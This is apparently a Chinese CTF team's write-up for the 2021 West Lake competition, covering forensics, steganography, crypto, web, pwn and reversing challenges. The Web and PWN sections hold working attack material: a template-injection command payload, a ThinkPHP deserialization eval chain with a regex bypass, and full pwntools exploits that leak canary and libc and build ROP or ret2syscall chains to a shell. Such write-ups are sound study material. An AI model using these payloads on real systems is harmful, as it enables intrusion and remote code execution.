爷们的自留地

image-20211121113647923

事情的起因很简单:

起初是👴🚪想和各位👴线下面基,想看看哪个比赛容易进线下;
然后在风和🌞丽的某一天,群里突然出现了西湖论⚔️的邀请函;
至此,👴🚪面基的想法就变成了,去西湖击剑
👴🚪拼了命的上分,然后静止在了43名,差十三名才能进线下。
明年再来吧,还有 HWS 的冬令营能面基,并不是对击剑的执著,而是对 ctf 的热爱。
image-20211121114513772

做出了一半的题目,这里把👴🚪写的wp放上来,记录一下。
(不要问👴明明是个pwn✋为什么打了一天MISC,问就是太菜了)

MISC

签到 By-Da1Da1A0E

图书馆社死,喊了好多次:
img

YUSA的小秘密 By-Shangu

image-20211120192212506

首先,从提示就能想到这道题大概的考察点,LSB加上不止RGB,说明采用的不是RGB,参考Bytectf2020的第一道图片题:https://bytectf.feishu.cn/docs/doccnqzpGCWH1hkDf5ljGdjOJYg#qHRUCR
那道题的思路是,转换 YCrCb 通道,再提取出 三色道,分别是三张二维码片段,最后手动拼接一下或者合成都可以。

参考那道题的思路,首先对Yusa照片色彩空间转换:

1
2
3
4
5
6
7
8
import cv2 as cv
import os
import numpy as np
save="F:\\"

img = cv.imread('F:/mark.png') # 读取图片
ycrcb = cv.cvtColor(img, cv.COLOR_BGR2YCrCb)

然后二值化处理:

1
2
3
4
5
6
b = (b % 2) * 255
g = (g % 2) * 255
r = (r % 2) * 255
cv.imshow("split blue", b)
cv.imshow("split green", g)
cv.imshow("split red", r)

这里有个坑,让我浪费了好长时间,我的 python 的 imshow 只能显示图片的一部分。
然而这道题比去年的还简单,二值化以后直接能看到flag。
尽量不要用 imshowimwirte,得到blue的图像中得到flag:

1
2
3
cv.imwrite(os.path.join(save,"blue.png"),b)
cv.imwrite(os.path.join(save,"green.png"),g)
cv.imwrite(os.path.join(save,"red.png"),r)

blue

Yusa的秘密 By-Shangu

image-20211120195801372

内存题,先用 passwordkit 嗦一下看看有没有密码,得到密码 YusaYusa520,刚好是Who_Am_I 的解压密码:
image-20211121094526746

上取证大师,全局搜索一下提示里出现的俩关键词 “Yusa” 和 “Sakura” ,得到下面的这些文件:

在查文件过程中,顺手发现了几个中文的文件,之后都会用到,提取 dump 出来。
image-20211120200916300

image-20211120200423896

0x000000003f959980 1 0 R–r-- \Device\HarddiskVolume2\Users\Yusa\Desktop\Sakura文件\Sakura-备忘录
0x000000003e748f20 1 0 R–r-d \Device\HarddiskVolume2\Users\Yusa\Contacts\Yusa.contact
0x000000003e78c6a0 1 0 R–r-- \Device\HarddiskVolume2\Users\Yusa\Desktop\Sakura文件\Sakura-公告
0x000000003e20d900 1 0 R–r-- \Device\HarddiskVolume2\Users\Yusa\Desktop\新建文本文档.txt

具体哪个是哪个我也忘了,dump出来文件名会变,有用的文件如下:

根据公告里的提示,去查找 .contact 联系人文件,一共找到 Yusa.contact 和Man.contact 两个文件
image-20211120201541593

两个联系人文件中有彩蛋一个,还有个base加密,cyberchef一把嗦出来得到 一个解压密码:

image-20211120201743910

这是你会用到的key,可以用它打开组织给你的工具。工具命名依照了传统规则。key:820ac92b9f58142bbbc27ca295f1cf48
然后按照传统,找一下压缩包文件,都导出来挨个试密码,最后确定这个密码打开了 Sakura-didi 这个文件,里面存着 bmp 文件。还有一个放着 exp 的压缩包没有找到密码。
image-20211120202601872

回头用取证大师在看一下进程有没有可疑的信息,发现了老熟人,windows便签:
image-20211121095104604

win7的便签后缀名是snt,搜索一下得到最后一个解压密码:
image-20211121095317137

发现取证大师恢复不了,用 vol dump出来,这里需要替换掉本地的便签文件,不知道是不是我win10坏了,下了个win7虚拟机,用win7可以开:
BIANQIAasdaN

解压三个文件的到的:

Who_Am_I exp.py key.bmp

分析exp里的加密流程以后,发现直接改一下flag 和 who的位置,然后改成可写,就可以得到flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from PIL import Image
import struct
pic = Image.open('key.bmp')
fp = open('Who_am_I', 'rb')
fs = open('flag', 'wb')

a, b = pic.size
list1 = []
for y in range(b):
for x in range(a):
pixel = pic.getpixel((x, y))
list1.extend([pixel[1], pixel[0], pixel[2], pixel[2], pixel[1], pixel[0]])

data = fp.read()
for i in range(0, len(data)):
fs.write(struct.pack('B', data[i] ^ list1[i % a*b*6]))
fp.close()
fs.close()

用stegsolve处理图片,找到flag,就是有点废眼睛:

frame10

flag在图的下面。

Crypto

hardrsa By-Shangu

原题:https://blog.csdn.net/a5555678744/article/details/117717969
照搬一下代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
from Crypto.Util.number import *
import sympy

#求p
# y = 449703347709287328982446812318870158230369688625894307953604074502413258045265502496365998383562119915565080518077360839705004058211784369656486678307007348691991136610142919372779782779111507129101110674559235388392082113417306002050124215904803026894400155194275424834577942500150410440057660679460918645357376095613079720172148302097893734034788458122333816759162605888879531594217661921547293164281934920669935417080156833072528358511807757748554348615957977663784762124746554638152693469580761002437793837094101338408017407251986116589240523625340964025531357446706263871843489143068620501020284421781243879675292060268876353250854369189182926055204229002568224846436918153245720514450234433170717311083868591477186061896282790880850797471658321324127334704438430354844770131980049668516350774939625369909869906362174015628078258039638111064842324979997867746404806457329528690722757322373158670827203350590809390932986616805533168714686834174965211242863201076482127152571774960580915318022303418111346406295217571564155573765371519749325922145875128395909112254242027512400564855444101325427710643212690768272048881411988830011985059218048684311349415764441760364762942692722834850287985399559042457470942580456516395188637916303814055777357738894264037988945951468416861647204658893837753361851667573185920779272635885127149348845064478121843462789367112698673780005436144393573832498203659056909233757206537514290993810628872250841862059672570704733990716282248839
# c1 = 78100131461872285613426244322737502147219485108799130975202429638042859488136933783498210914335741940761656137516033926418975363734194661031678516857040723532055448695928820624094400481464950181126638456234669814982411270985650209245687765595483738876975572521276963149542659187680075917322308512163904423297381635532771690434016589132876171283596320435623376283425228536157726781524870348614983116408815088257609788517986810622505961538812889953185684256469540369809863103948326444090715161351198229163190130903661874631020304481842715086104243998808382859633753938512915886223513449238733721777977175430329717970940440862059204518224126792822912141479260791232312544748301412636222498841676742208390622353022668320809201312724936862167350709823581870722831329406359010293121019764160016316259432749291142448874259446854582307626758650151607770478334719317941727680935243820313144829826081955539778570565232935463201135110049861204432285060029237229518297291679114165265808862862827211193711159152992427133176177796045981572758903474465179346029811563765283254777813433339892058322013228964103304946743888213068397672540863260883314665492088793554775674610994639537263588276076992907735153702002001005383321442974097626786699895993544581572457476437853778794888945238622869401634353220344790419326516836146140706852577748364903349138246106379954647002557091131475669295997196484548199507335421499556985949139162639560622973283109342746186994609598854386966520638338999059
# x=sympy.discrete_log(y,c1,2)
# print(x)

c = 57248258945927387673579467348106118747034381190703777861409527336272914559699490353325906672956273559867941402281438670652710909532261303394045079629146156340801932254839021574139943933451924062888426726353230757284582863993227592703323133265180414382062132580526658205716218046366247653881764658891315592607194355733209493239611216193118424602510964102026998674323685134796018596817393268106583737153516632969041693280725297929277751136040546830230533898514659714717213371619853137272515967067008805521051613107141555788516894223654851277785393355178114230929014037436770678131148140398384394716456450269539065009396311996040422853740049508500540281488171285233445744799680022307180452210793913614131646875949698079917313572873073033804639877699884489290120302696697425
dp = 379476973158146550831004952747643994439940435656483772269013081580532539640189020020958796514224150837680366977747272291881285391919167077726836326564473
p=12131601165788024635030034921084070470053842112984866821070395281728468805072716002494427632757418621194662541766157553264889658892783635499016425528807741
print(long_to_bytes(pow(c,dp,p)))

求 p 脚本运算量很大,放在服务器跑了四分钟才出来,就不再跑了。
之后照抄脚本,在sage跑一下得到p:

1
2
3
4
5
6
y=449703347709287328982446812318870158230369688625894307953604074502413258045265502496365998383562119915565080518077360839705004058211784369656486678307007348691991136610142919372779782779111507129101110674559235388392082113417306002050124215904803026894400155194275424834577942500150410440057660679460918645357376095613079720172148302097893734034788458122333816759162605888879531594217661921547293164281934920669935417080156833072528358511807757748554348615957977663784762124746554638152693469580761002437793837094101338408017407251986116589240523625340964025531357446706263871843489143068620501020284421781243879675292060268876353250854369189182926055204229002568224846436918153245720514450234433170717311083868591477186061896282790880850797471658321324127334704438430354844770131980049668516350774939625369909869906362174015628078258039638111064842324979997867746404806457329528690722757322373158670827203350590809390932986616805533168714686834174965211242863201076482127152571774960580915318022303418111346406295217571564155573765371519749325922145875128395909112254242027512400564855444101325427710643212690768272048881411988830011985059218048684311349415764441760364762942692722834850287985399559042457470942580456516395188637916303814055777357738894264037988945951468416861647204658893837753361851667573185920779272635885127149348845064478121843462789367112698673780005436144393573832498203659056909233757206537514290993810628872250841862059672570704733990716282248839
num= 上面跑出来的 x ,太浪费时间就不写了。
R.<x>=Zmod(y)[]
f=2019*x**2+2020*x**3+2021*x**4-num
f.roots()
#result = 12131601165788024635030034921084070470053842112984866821070395281728468805072716002494427632757418621194662541766157553264889658892783635499016425528807741

最后执行脚本得到flag:

image-20211120205628455

unknown_dsa By-Tr0jAn

解佩尔方程得ul和vl,都是佩尔方程的最小解,解完之后可以通过excrt拿到m1 m2,然后就可以解出p,q

$$
pq与(p-1)/q
$$
然后由计算得到k,最后求x1与x2得到flag
$$
\s1 \equiv (hm1+x1
r1) * k^{-1}(mod \ q)
\s2 \equiv (hm2+x1*r1) * k^{-1}(mod \ q)
$$
之后直接求x1与x2即可。

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
from sage.all import *
from functools import reduce
import gmpy2
from Crypto.Util.number import long_to_bytes

def exgcd(a, b):
if b == 0: return 1, 0
x, y = exgcd(b, a % b)
return y, x - a // b * y


def uni(P, Q):
r1, m1 = P
r2, m2 = Q

d = gmpy2.gcd(m1, m2)
assert (r2 - r1) % d == 0

l1, l2 = exgcd(m1 // d, m2 // d)

return (r1 + (r2 - r1) // d * l1 * m1) % gmpy2.lcm(m1, m2), gmpy2.lcm(m1, m2)


def CRT(eq):
return reduce(uni, eq)


def solve_pell(N, numTry=100):
cf = continued_fraction(sqrt(N))
for i in range(numTry):
denom = cf.denominator(i)
numer = cf.numerator(i)
if numer ^ 2 - N * denom ^ 2 == 1:
return numer, denom
return None, None


N = 4013184893
solve_pell(N)
ms1 = [
10537190383977432819948602717449313819513015810464463348450662860435011008001132238851729268032889296600248226221086420035262540732157097949791756421026015741477785995033447663038515248071740991264311479066137102975721041822067496462240009190564238288281272874966280,
121723653124334943327337351369224143389428692536182586690052931548156177466437320964701609590004825981378294358781446032392886186351422728173975231719924841105480990927174913175897972732532233,
1440176324831562539183617425199117363244429114385437232965257039323873256269894716229817484088631407074328498896710966713912857642565350306252498754145253802734893404773499918668829576304890397994277568525506501428687843547083479356423917301477033624346211335450]
cs1 = [
2852589223779928796266540600421678790889067284911682578924216186052590393595645322161563386615512475256726384365091711034449682791268994623758937752874750918200961888997082477100811025721898720783666868623498246219677221106227660895519058631965055790709130207760704,
21115849906180139656310664607458425637670520081983248258984166026222898753505008904136688820075720411004158264138659762101873588583686473388951744733936769732617279649797085152057880233721961,
301899179092185964785847705166950181255677272294377823045011205035318463496682788289651177635341894308537787449148199583490117059526971759804426977947952721266880757177055335088777693134693713345640206540670123872210178680306100865355059146219281124303460105424]
m1, mod1 = CRT(zip(cs1, ms1))
ms2 = [
168450500310972930707208583777353845862723614274337696968629340838437927919365973736431467737825931894403582133125917579196621697175572833671789075169621831768398654909584273636143519940165648838850012943578686057625415421266321405275952938776845012046586285747,
1921455776649552079281304558665818887261070948261008212148121820969448652705855804423423681848341600084863078530401518931263150887409200101780191600802601105030806253998955929263882382004,
25220695816897075916217095856631009012504127590059436393692101250418226097323331193222730091563032067314889286051745468263446649323295355350101318199942950223572194027189199046045156046295274639977052585768365501640340023356756783359924935106074017605019787]
cs2 = [
148052450029409767056623510365366602228778431569288407577131980435074529632715014971133452626021226944632282479312378667353792117133452069972334169386837227285924011187035671874758901028719505163887789382835770664218045743465222788859258272826217869877607314144,
1643631850318055151946938381389671039738824953272816402371095118047179758846703070931850238668262625444826564833452294807110544441537830199752050040697440948146092723713661125309994275256,
10949587016016795940445976198460149258144635366996455598605244743540728764635947061037779912661207322820180541114179612916018317600403816027703391110922112311910900034442340387304006761589708943814396303183085858356961537279163175384848010568152485779372842]
m2, mod2 = CRT(zip(cs2, ms2))

p = 95139353880772104939870618145448234251031105153406565833029787299040378395002190438381537974853777890692924407167823818980082672873538133127131356810153012924025270883966172420658777903337576027105954119811495411149092960422055445121097259802686960288258399754185484307350305454788837702363971523085335074839
q = 895513916279543445314258868563331268261201605181
t = 60132176395922896902518845244051065417143507550519860211077965501783315971109433544482411208238485135554065241864956361676878220342500208011089383751225437417049893725546176799417188875972677293680033005399883113531193705353404892141811493415079755456185858889801456386910892239869732805273879281094613329645326287205736614546311143635580051444446576104548
tmp = p * q - (p + q)
n = p * q
s1 = 376599166921876118994132185660203151983500670896
s2 = 187705159843973102963593151204361139335048329243
hm1 = 63998600246749767922010292163233985055258508821
hm2 = 1121013631791355094793010532678158450130791457285
ds = s1 - s2
dm = hm1 - hm2
k = gmpy2.mul(dm, gmpy2.invert(ds, q)) % q
r1 = 498841194617327650445431051685964174399227739376
r2 = 620827881415493136309071302986914844220776856282
s3 = 674735360250004315267988424435741132047607535029
x1 = (s1 * k - hm1) * gmpy2.invert(r1, q) % q
print(long_to_bytes(int(x1)).decode())
x2 = (s3 * k - hm1) * gmpy2.invert(r2, q) % q
print(long_to_bytes(int(x2)).decode())


Get flag!

DASCTF{f11bad18f529750fe52c56eed85d001b}

Crypto5-密码人集合 By-0xK4ws

nc连上去发现是做数独题 9x9的数独

网上找一个脚本跑一下就完事

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
from typing import List

class Solution:
def solveSudoku(self, board: List[List[str]]) -> None:
def dfs(pos: int):
nonlocal valid
if pos == len(spaces):
valid = True
return

i, j = spaces[pos]
for digit in range(9):
if line[i][digit] == column[j][digit] == block[i // 3][j // 3][digit] == False:
line[i][digit] = column[j][digit] = block[i // 3][j // 3][digit] = True
board[i][j] = str(digit + 1)
dfs(pos + 1) #递归
line[i][digit] = column[j][digit] = block[i // 3][j // 3][digit] = False
if valid:
return

line = [[False] * 9 for _ in range(9)]
column = [[False] * 9 for _ in range(9)]
block = [[[False] * 9 for _a in range(3)] for _b in range(3)]
valid = False
spaces = list()

for i in range(9):
for j in range(9):
if board[i][j] == ".":
spaces.append((i, j))
else:
digit = int(board[i][j]) - 1
line[i][digit] = column[j][digit] = block[i // 3][j // 3][digit] = True

dfs(0)

board = [
[".", ".", ".", ".", "3", ".", ".", "5", "."],
["2", ".", ".", ".", "5", "1", ".", "6", "."],
[".", "4", ".", ".", ".", ".", ".", ".", "."],
[".", "2", ".", "9", ".", ".", ".", ".", "."],
[".", ".", "3", ".", ".", "2", ".", "8", "6"],
[".", "8", ".", ".", "6", ".", "2", ".", "."],
[".", ".", ".", ".", "9", ".", ".", ".", "."],
[".", ".", ".", ".", ".", ".", ".", "9", "."],
[".", ".", ".", ".", ".", "4", ".", "3", "2"]]

Solution().solveSudoku(board)
for i in range(9):
print(board[i])

https://www.pythonheidong.com/blog/article/611784/69977d3f01fb34121944/

然后再进行数字和字符之间的替换就行

西湖论剑我要拿第一

1 2 3 4 5 6 7 8 9

西湖论剑我要拿第一

以上是对应关系

然后输入解拿到flag

WEB

EZupload By-0kam1 & Da1Da1A0E

首先view-source 看到 ?source=1

拿到源码

然后在本地写一个文件上传到远程的html

img

然后我们就开始了文件上传之路

我们上传一个index.latte 发现能被渲染。

img

然后试着代码执行,用phpinfo实现

因为echo “${phpinfo()}”;

img

=等同于echo

双引号内的变量不会被当成字符串,所以组成

{=“${phpinfo()}”}

等同于 echo “${PHPINFO()}”

即打出payload

img

因为``可以进行代码执行,但是不会回显,所以我们选择用>将结果写入txt文件读取

故payload为

{=“${cat /flag >8.txt}”}

拿到flag

img

灏妹的web By-Da1Da1A0E & 0kam1

首先进入题目,看到一张图片,啥都没有。。头文件也没啥东西,忙碌了半天的呆师傅决定直接dirsearch

python3 dirsearch.py -u http://d3df17fc-6f1a-4d98-ad6d-0fe8c5a50eb8.haomeidehelloworld-ctf.dasctf.com:2333/ --exclude-sizes 0B

img

扫描,发现idea泄露。、

逐个看过去。

访问第一个页面就找到了flag

img

img

EasyTp By-0kam1

打开网站是这个

http://8ee57807-23ba-44f3-86c0-28266918cb75.easytp-ctf.dasctf.com:2333/

再看了下题目说是public文件下

img

http://8ee57807-23ba-44f3-86c0-28266918cb75.easytp-ctf.dasctf.com:2333/public/

img

提示缺参数

构造

img

是个这玩意扔bp里面去fuzz

常用的php文件

得到三个

Index.php System.php PEAR.php

因为题目提示说是easytp

那就想办法tp爆错爆出版本呗

根据tp路由+Index文件内容的思路去构造爆错语句

public/index.php/unser

img

确定tp框架版本

查相关的漏洞点

尝试了几个链

找到个eval链可用的

https://f5.pm/go-63946.html

img

且存在直接的exp

本地服务器搭建扔进去生成序列化代码

得到一个这玩意 base64编码的

img

解码后转url

把这串直接拿过去打

img

img

回显hacking

看了眼代码

img

是正则匹配的问题

绕呗还能咋搞

根据parse_url函数匹配的思路函数去绕

构造一个不合格的url即在public前加很多///符号

直接phpinfo

接下来就很常规了 把phpinfo的内容改成读取flag文件就好了

img

exp和之前的一样

img

生成解码编码打

img

收工跑路

PWN

string_go By-f1ag

漏洞点在于lative_func()这,一开始分析v3是不受我们控制的,但发现动态调试后,如下,可以看见v3是有calc函数得来的。

img

因此我们先输入‘1+2‘即可进入lative_func()中

发现有输出函数,当v7=-1时即可输出栈上的内容。泄露出canary和libc

img

然后通过memcpy函数来覆盖返回地址执行rop

img

完整exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
from pwn import *
#io=process('string_go')
#io=remote('82.157.20.104',41600)
io=remote('82.157.20.104',37700)
context.log_level='debug'
elf=ELF('./string_go')
#libc=elf.libc
libc=ELF('./libc-2.27.so')
context.arch='amd64'

io.sendlineafter('>>> ','1+2')
io.sendlineafter('>>> ','-1')
io.sendlineafter('>>> ','a'*0x8)

io.sendlineafter('>>> ','1')
io.recv(0x28)
addr=u64(io.recv(8))-0x730157
io.recv(8)
canary=u64(io.recv(8))
print('canary',hex(canary))
print('addr',hex(addr))
system=addr+libc.symbols['system']
binsh=addr+libc.search('/bin/sh').next()

#gdb.attach(io)
io.sendline('1'*0x18+p64(canary)+p64(0)*3+p64(addr+libc.search(asm('ret')).next())+p64(addr+libc.search(asm('pop rdi\nret')).next())+p64(binsh)+p64(system))

io.interactive()

blind By-f1ag

发现alarm中有syscall,因此可以利用ret2syscall。利用csu那一大串pop可以对rdx置0,又因为没有libc,因此我们无法确定syscall具体在何处,因此我们需要爆破一个字节。

Exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from pwn import *
context.log_level = "debug"
#io=process('./blind')
#io=remote('82.157.6.165',20400)
elf=ELF('blind')
read_got=elf.got['read']
alarm_got=elf.got['alarm']

pop_rdi = 0x00000000004007c3
pop_rsi_r15 = 0x00000000004007c1
csu=0x4007BA
mov_rdx=0x4007A0

def exp(i):
payload = "a" * 0x58
payload+=p64(csu)+p64(0)+p64(1)+p64(read_got)+p64(1)+p64(alarm_got)+p64(0)+p64(mov_rdx)+'a'*56
payload+=p64(csu)+p64(0)+p64(1)+p64(read_got)+p64(0x3b)+p64(0x601288)+p64(0)+p64(mov_rdx)+'a'*56
payload+=p64(csu)+p64(0)+p64(1)+p64(alarm_got)+p64(0)+p64(0)+p64(0x601288)+p64(mov_rdx)+'a'*56
payload += (0x500 - len(payload)) * "\x00"
#gdb.attach(io)
io.send(payload)
io.send(p8(i))
io.send("/bin/sh\x00" + "a" * (0x3b-8))
io.interactive()


for i in range(0,0xff):
try:
io=remote('82.157.6.165',20400)
exp(i)
except:
io.close()

RE

ROR By-yaoxixi

Flag40位,8个一组,一共5组

把8个字符串的相同位的bit取出,组成一个字节,与已知的明文串进行比较

img

两个for循环实现了这个操作,写脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#include<stdio.h>
#include<stdlib.h>
int c[100]={
0x65, 0x55, 0x24, 0x36, 0x9D, 0x71, 0xB8, 0xC8, 0x65, 0xFB,
0x87, 0x7F, 0x9A, 0x9C, 0xB1, 0xDF, 0x65, 0x8F, 0x9D, 0x39,
0x8F, 0x11, 0xF6, 0x8E, 0x65, 0x42, 0xDA, 0xB4, 0x8C, 0x39,
0xFB, 0x99, 0x65, 0x48, 0x6A, 0xCA, 0x63, 0xE7, 0xA4, 0x79};
int b[1000]={ 0x65, 0x08, 0xF7, 0x12, 0xBC, 0xC3, 0xCF, 0xB8, 0x83, 0x7B,
0x02, 0xD5, 0x34, 0xBD, 0x9F, 0x33, 0x77, 0x76, 0xD4, 0xD7,
0xEB, 0x90, 0x89, 0x5E, 0x54, 0x01, 0x7D, 0xF4, 0x11, 0xFF,
0x99, 0x49, 0xAD, 0x57, 0x46, 0x67, 0x2A, 0x9D, 0x7F, 0xD2,
0xE1, 0x21, 0x8B, 0x1D, 0x5A, 0x91, 0x38, 0x94, 0xF9, 0x0C,
0x00, 0xCA, 0xE8, 0xCB, 0x5F, 0x19, 0xF6, 0xF0, 0x3C, 0xDE,
0xDA, 0xEA, 0x9C, 0x14, 0x75, 0xA4, 0x0D, 0x25, 0x58, 0xFC,
0x44, 0x86, 0x05, 0x6B, 0x43, 0x9A, 0x6D, 0xD1, 0x63, 0x98,
0x68, 0x2D, 0x52, 0x3D, 0xDD, 0x88, 0xD6, 0xD0, 0xA2, 0xED,
0xA5, 0x3B, 0x45, 0x3E, 0xF2, 0x22, 0x06, 0xF3, 0x1A, 0xA8,
0x09, 0xDC, 0x7C, 0x4B, 0x5C, 0x1E, 0xA1, 0xB0, 0x71, 0x04,
0xE2, 0x9B, 0xB7, 0x10, 0x4E, 0x16, 0x23, 0x82, 0x56, 0xD8,
0x61, 0xB4, 0x24, 0x7E, 0x87, 0xF8, 0x0A, 0x13, 0xE3, 0xE4,
0xE6, 0x1C, 0x35, 0x2C, 0xB1, 0xEC, 0x93, 0x66, 0x03, 0xA9,
0x95, 0xBB, 0xD3, 0x51, 0x39, 0xE7, 0xC9, 0xCE, 0x29, 0x72,
0x47, 0x6C, 0x70, 0x15, 0xDF, 0xD9, 0x17, 0x74, 0x3F, 0x62,
0xCD, 0x41, 0x07, 0x73, 0x53, 0x85, 0x31, 0x8A, 0x30, 0xAA,
0xAC, 0x2E, 0xA3, 0x50, 0x7A, 0xB5, 0x8E, 0x69, 0x1F, 0x6A,
0x97, 0x55, 0x3A, 0xB2, 0x59, 0xAB, 0xE0, 0x28, 0xC0, 0xB3,
0xBE, 0xCC, 0xC6, 0x2B, 0x5B, 0x92, 0xEE, 0x60, 0x20, 0x84,
0x4D, 0x0F, 0x26, 0x4A, 0x48, 0x0B, 0x36, 0x80, 0x5D, 0x6F,
0x4C, 0xB9, 0x81, 0x96, 0x32, 0xFD, 0x40, 0x8D, 0x27, 0xC1,
0x78, 0x4F, 0x79, 0xC8, 0x0E, 0x8C, 0xE5, 0x9E, 0xAE, 0xBF,
0xEF, 0x42, 0xC5, 0xAF, 0xA0, 0xC2, 0xFA, 0xC7, 0xB6, 0xDB,
0x18, 0xC4, 0xA6, 0xFE, 0xE9, 0xF5, 0x6E, 0x64, 0x2F, 0xF1,
0x1B, 0xFB, 0xBA, 0xA7, 0x37, 0x8F};
unsigned char Str[100];
int v6[20]={128,64,32,16,8,4,2,1};
unsigned char str2[10];
int main(){
for(int i=0;i<40;i++){
for(int j=0;j<256;j++){
if(b[j]==c[i]){
printf("%d ",j);
break;
}
}
}



return 0;
}

img

得到要比较的字符串

把每一个字符串按照二进制展开,重新排列即可

img

把每一列连起来就是flag,依次拼接,手算得出flag

TacticalArmed By-yaoxixi

sub_4011F0函数把lpAddress的地址进行解密,最后调用了v21函数,用动态调试dump出程序,查看算法

img

观察dump出来的程序,再结合动态调试,可以发现这是一个魔改的base64

img

第一个改动的地方DELTA 改成0x81A5692E

第二个改动的地方解密循环增加了一次

第三个改动的地方每一次解密的sum值都不同,依次乘与12345

套脚本 拿到所有的数据

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#include <stdio.h>
#include <stdint.h>


//解密函数
void decrypt (unsigned int* v,unsigned int* k) {
unsigned int v0=v[0], v1=v[1], sum=0x81A5692E*33, i;
int delta=0x81A5692E;
unsigned int k0=k[0], k1=k[1], k2=k[2], k3=k[3];
for (i=0; i<33; i++) {
v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
sum -= delta;
}
v[0]=v0; v[1]=v1;
}

int main()
{
unsigned int v[100]={0x422f1ded,0x1485e472},k[4]={0x7ce45630,0x58334908,0x66398867,0xc35195B1};

for(int i=0;i<2;i+=2){
decrypt(&v[i], k);

printf("%x %x",v[0],v[1]);
}

return 0;
}

img

后面的数据类似,把拿到的数据逆序排列,即可拿到flag

Re4-虚假的粉丝 By-0xK4ws

part1_key是数字 他在后面会进行整数转字符串的操作

Untitled

然后在f文件夹里面的该数字对应的txt文件中 输入的第二个整形数据是该文件开始偏移所对应的字符位置 第三个要输入的整型数据是size

也就是从偏移对应的字符开始需要读取数据的大小

并且要保证该字符为U 从该字符开始向后偏移39个的字符是S

![Untitled](https://cdn.jsdelivr.net/gh/shanguwei/CDN@latest/img/2021/11/21/62622_Untitled 1.png)

首先遍历f文件夹下的所有txt文件 找到既有字符U又有字符S的文件 发现只有一个4157

然后再进文件算U的偏移 为1118

Size是40

![Untitled](https://cdn.jsdelivr.net/gh/shanguwei/CDN@latest/img/2021/11/21/48611_Untitled 2.png)

然后run程序依次输入上诉得到base64解码 得到S3Cre7_K3y%20%3D%20Al4N_wAlK3R Al4N_wAlK3R也就是第四次输入

然后输入完后等一首歌的时间 打开这个文件./f/ASCII-faded 5315.txt 就是flag

![Untitled](https://cdn.jsdelivr.net/gh/shanguwei/CDN@latest/img/2021/11/21/46408_Untitled 3.png)

👴的壁纸

ymddeccz